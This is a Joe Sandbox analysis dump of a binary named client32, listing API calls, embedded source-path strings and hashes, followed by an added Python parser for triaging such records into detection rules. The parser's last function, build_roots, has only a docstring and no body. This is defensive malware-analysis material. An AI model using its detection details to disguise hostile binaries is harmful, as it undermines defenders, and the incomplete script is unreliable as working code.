• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 863766397-389219706
                                                                                APIs
                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                Similarity
                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                • API String ID: 2735369351-763374134
                                                                                APIs
                                                                                • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                • EndPaint.USER32(?,?), ref: 1100572F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110056C8
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                Similarity
                                                                                • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1216912278-2830328467
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(76967AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                                • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                  • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                                • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                                Similarity
                                                                                • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                • String ID:
                                                                                • API String ID: 3235510773-0
                                                                                APIs
                                                                                • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                                • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                                • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                                • UI.CPP, xrefs: 111399BD
                                                                                • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                                Similarity
                                                                                • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                                • API String ID: 1808733558-973815363
                                                                                APIs
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                • String ID:
                                                                                • API String ID: 705253285-0
                                                                                APIs
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                • API String ID: 2776021309-3012761530
                                                                                • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101D66E
                                                                                • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                • String ID: 0
                                                                                • API String ID: 430917334-4108050209
                                                                                • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                APIs
                                                                                • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 2375713580-0
                                                                                • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                                • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 414154005-0
                                                                                • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
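The function records above are what a reverser works from when turning a sandbox run into detections, and two things in them are worth extracting mechanically rather than by eye: the fatal-assert path (GetLastError, wsprintfA, MessageBoxA with the caption Client32, then ExitProcess, all reached through the shared helper at 11029A70) and the compiler-embedded source paths in the String ID fields (..\ctl32\Coolbar.cpp, ..\CTL32\annotate.cpp, e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h), which survive as literal strings in the dropped client32 binary. The parser below is an added example, not Joe Sandbox's own code or export API. It assumes a plain-text export laid out exactly like the blocks on this page (the same section labels, one bullet per line, subcall entries indented under the caller's own calls, every record opening with its API list); the sample input is a constructed, abbreviated copy of two of the records above.

```python
"""Parse Joe Sandbox per-function records ('APIs' / 'Strings' / 'Memory Dump Source' / 'Similarity') for triage."""
import re
from dataclasses import dataclass, field

# Constructed excerpt, abbreviated from two of the records above. Assumption: the
# plain-text export keeps these section labels, one bullet per line, with
# 'Part of subcall function' entries indented under the caller's own calls.
SAMPLE_REPORT = r"""
APIs
• InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
• String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
• Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
APIs
• LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
• RegisterClassExA.USER32(00000030), ref: 1101D6F1
• GetLastError.KERNEL32 ref: 1101D6F7
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• String ID: 0
• Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
"""

SECTION_LABELS = {"APIs", "Strings", "Memory Dump Source",
                  "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<via>[0-9A-F]+): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<value>.*)$")
SOURCE_PATH_RE = re.compile(r"^(?:[a-z]:\\|\.\.\\).*\.(?:cpp|c|h)$", re.I)


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # dicts: name, module, args, ref, via
    strings: list = field(default_factory=list)  # bullets under 'Strings'
    fields: dict = field(default_factory=dict)   # 'Source File', 'String ID', 'Opcode ID', ...

    @property
    def string_ids(self):  # 'String ID' is a '$'-joined list
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def base(self):  # image base the dump was rebased to ('Offset: 11000000')
        m = re.search(r"Offset: ([0-9A-F]+)", self.fields.get("Source File", ""), re.I)
        return int(m.group(1), 16) if m else None


def parse_report(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_LABELS:
            if line == "APIs":  # assumption: every record opens with its API list
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            item = line.lstrip("•").strip()
            if section == "APIs":
                m = API_RE.match(item)
                if m:
                    current.apis.append(m.groupdict())
            elif section == "Strings":
                current.strings.append(item)
            elif (m := KV_RE.match(item)):
                current.fields[m["key"].strip()] = m["value"].strip()
    return records


def fatal_exit_paths(records):
    """Records that can kill the process behind a message box, with the helper(s) that call ExitProcess."""
    hits = []
    for rec in records:
        if {"MessageBoxA", "ExitProcess"} <= {a["name"] for a in rec.apis}:
            helpers = sorted({a["via"] for a in rec.apis if a["name"] == "ExitProcess" and a["via"]})
            hits.append((rec.fields.get("Opcode ID", "")[:12], helpers))
    return hits


def source_paths(records):
    """Compiler-embedded source paths (assert/__FILE__ strings) across all records."""
    return sorted({s for r in records for s in r.string_ids if SOURCE_PATH_RE.match(s)})


def build_roots(paths):
    """Drive-rooted paths expose the vendor build tree; the part above the source
    directory is the distinctive token to carry into a YARA or IOC rule."""
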